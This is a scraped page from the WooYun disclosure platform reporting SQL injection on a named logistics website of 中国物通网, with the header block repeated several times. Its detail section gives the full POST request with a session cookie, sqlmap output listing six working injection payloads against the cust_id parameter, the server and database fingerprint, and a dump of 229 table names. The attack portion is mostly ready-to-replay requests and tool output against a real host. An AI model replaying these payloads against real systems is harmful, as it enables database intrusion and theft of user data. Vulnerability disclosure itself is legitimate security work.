中国物通网某站存在SQL注入 | wooyun-2015-0153405| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153405

漏洞标题：中国物通网某站存在SQL注入

漏洞作者：路人甲

提交时间：2015-11-11 10:21

修复时间：2015-11-24 07:14

公开时间：2015-11-24 07:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：细节已通知厂商并且等待厂商处理中
2015-11-24：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

POST /Ashx/GetWshi.ashx?companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=1072364&pid=1&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02 HTTP/1.1
Content-Length: 485
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=xmz5ifblol3dv4qgymnrpd00; TemGold_1072364=1,14,4,3,5,6,11,12,10,13; TemFormat_1072364=lsrb; BAIDUID=8E474BC330333966DD7B0C2263535823:FG=1; Hm_lvt_b056f6db54a055cf5bfde997b9ed913f=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_b056f6db54a055cf5bfde997b9ed913f=1447121708; Hm_lvt_d653978debccea19667b401ab77ac0ad=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_d653978debccea19667b401ab77ac0ad=1447121708; HMACCOUNT=A63704B16C8F6603
Host: ynztwl.chinawutong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=123&kind=%25u914D%25u8D27%25u4FE1%25u606F%25u90E8&pid=1&random=0.7215899890288711&toCity=%25u94DC%25u5DDD%25u5E02&toPro=%25u9655%25u897F%25u7701&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cust_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 8050=8050&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 4256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4256=4256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1280=1280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123;WAITFOR DELAY '0:0:5'--&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 WAITFOR DELAY '0:0:5'&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(109)+CHAR(84)+CHAR(87)+CHAR(97)+CHAR(101)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: Wutong
[229 tables]
+----------------------------------------+
| AIRPORT                                |
| Admin                                  |
| Appraise                               |
| BlackList                              |
| CARRIER                                |
| CW_Device                              |
| CarLineUrl                             |
| Cert_Car                               |
| ChengYunOrder                          |
| ClickLog                               |
| CoPicture                              |
| Collect_Car                            |
| Collect_Car                            |
| Coupons                                |
| CustLink                               |
| CustLocation                           |
| DiaoCha                                |
| DomainList                             |
| EmailTriggerRecord                     |
| Emails                                 |
| GY_CharityCom                          |
| GY_EmergencyContact                    |
| GY_EmergencyGoods                      |
| GY_contribute                          |
| GY_help                                |
| GY_safety                              |
| GY_searchPerson                        |
| GjHuo                                  |
| Gonggao                                |
| GoodsDetail                            |
| GpsAuthorization                       |
| GpsInfo                                |
| HRAbility                              |
| HRCoverLetter                          |
| HREducation                            |
| HRExperience                           |
| HRFavJob                               |
| HRFavSeeker                            |
| HRJobCityPK                            |
| HRJobs                                 |
| HRPostSeekerPK                         |
| HRSeekerCompayPK                       |
| HRSeekerCompayPK                       |
| HRTrain                                |
| HighlyRecommend                        |
| HotmainLine                            |
| IDcardCheck                            |
| IMEI                                   |
| ImgLocation                            |
| InterAir                               |
| InterAirReq                            |
| InterLine                              |
| InterShipping                          |
| InterShippingReq                       |
| LISTAreas                              |
| LP_AD                                  |
| LP_AutoRepair                          |
| LP_Bath                                |
| LP_CarPark                             |
| LP_Catering                            |
| LP_Culture                             |
| LP_Hotel                               |
| LP_HouseRent                           |
| LP_LogisticsCom                        |
| LP_Merchants                           |
| LP_News                                |
| LP_NewsType                            |
| LP_Show                                |
| LP_TemplateAD                          |
| LP_WearHouse                           |
| LoginRecord                            |
| LongSourceHY                           |
| LongSourceHY                           |
| MSpeer_conflictdetectionconfigrequest  |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns                            |
| MSpeer_originatorid_history            |
| MSpeer_request                         |
| MSpeer_response                        |
| MSpeer_topologyrequest                 |
| MSpeer_topologyresponse                |
| MSpub_identity_range                   |
| MailTemp                               |
| MemberLogin                            |
| ModelKey                               |
| Nations                                |
| NewsCata                               |
| NewsCata                               |
| NewsClass                              |
| NewsData                               |
| OwnerContract                          |
| OwnersInsurance                        |
| PageNum                                |
| PayLog                                 |
| Picture_Licence                        |
| Product                                |
| RankOne                                |
| RankTwo                                |
| Refuse_Collect                         |
| ReturnPwd                              |
| SEAPORT                                |
| SMT_ypxxone                            |
| SMT_ypxxtwo                            |
| SendEmailRecord                        |
| ServiceRecord                          |
| SourceRecord                           |
| Temp                                   |
| TenderDocument                         |
| TextLocation                           |
| TopContacts                            |
| TopGoods                               |
| TuiSong                                |
| Url_Gj                                 |
| Url_Query                              |
| UserGPS                                |
| VI_CarLine                             |
| VI_SpecialLinePH                       |
| VI_SpecialLinePH                       |
| VI_Wshi                                |
| Vi_Company                             |
| Vi_HRApplySeeker                       |
| VoicWshi                               |
| WapLog                                 |
| WebBlackUser                           |
| WebLink                                |
| WebLog                                 |
| WliuZbiao                              |
| adminrizhi                             |
| androidImg                             |
| android_Activities                     |
| android_Products                       |
| android_Recommend                      |
| banjia                                 |
| bshi                                   |
| bumen                                  |
| bx_CusInsureInfo                       |
| bx_ParamsInsureInfo                    |
| bx_categories                          |
| bx_conveyances                         |
| bx_packages                            |
| bx_plan                                |
| bx_points                              |
| bx_xyzBackContent                      |
| caiwu                                  |
| cheLine                                |
| chezhu                                 |
| china_ad                               |
| com                                    |
| config                                 |
| daili                                  |
| dtproperties                           |
| goq_Company                            |
| gpsUserInfo                            |
| huiyuan                                |
| huoOld                                 |
| huo_order                              |
| huo_order                              |
| huo_print                              |
| huodong_order                          |
| infomationAppraise                     |
| jiameng_order                          |
| jianli                                 |
| jop                                    |
| keshi                                  |
| ksheng                                 |
| kshi                                   |
| kuaijian                               |
| link                                   |
| message                                |
| pay_information                        |
| powerUnit                              |
| push_CustomerTempThemes                |
| push_CustomerTopic                     |
| push_QuartzTable                       |
| push_Themes                            |
| push_autoPublish                       |
| push_roborder                          |
| qiyeView                               |
| qiyepic                                |
| qiyepic                                |
| renzheng_geren                         |
| renzheng_qiye                          |
| rolePower                              |
| sqlmapoutput                           |
| syncobj_0x3032423438383034             |
| syncobj_0x3439373531363345             |
| syncobj_0x3531423844353443             |
| syncobj_0x3630373132373946             |
| syncobj_0x3637443233313437             |
| syncobj_0x3739364335463539             |
| syncobj_0x3846364531304330             |
| syncobj_0x3846423930423839             |
| syncobj_0x3934324143354645             |
| syncobj_0x3938453936374632             |
| syncobj_0x4434363133443337             |
| syncobj_0x4438333843394444             |
| syncobj_0x4633453042374444             |
| sysarticlecolumns                      |
| sysarticles                            |
| sysarticleupdates                      |
| sysdiagrams                            |
| sysextendedarticlesview                |
| syspublications                        |
| sysreplservers                         |
| sysschemaarticles                      |
| syssubscriptions                       |
| systranschemas                         |
| tb_BuyInfor                            |
| tb_OneLeve                             |
| tb_SupplyInfor                         |
| tb_TwoLeve                             |
| tc_car                                 |
| tem_userset                            |
| userPower                              |
| view_Prize                             |
| wsheng                                 |
| wshiLinShi                             |
| wshiLinShi                             |
| wshiMainlineLinShi                     |
| wshiMainline_Price                     |
| wshiMainline_Price                     |
| wshiOrder                              |
| wxt_dd                                 |
| yanzheng_jiashi                        |
| yanzheng_xingshi                       |
| ygrizhi                                |
| yuangong                               |
| zhaoshang                              |
| zhengshu                               |
+----------------------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-24 07:14

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153405

漏洞标题：中国物通网某站存在SQL注入

相关厂商：中国物通网

漏洞作者：路人甲

提交时间：2015-11-11 10:21

修复时间：2015-11-24 07:14

公开时间：2015-11-24 07:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153405

漏洞标题：中国物通网某站存在SQL注入

相关厂商：中国物通网

漏洞作者： 路人甲

提交时间：2015-11-11 10:21

修复时间：2015-11-24 07:14

公开时间：2015-11-24 07:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153405"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云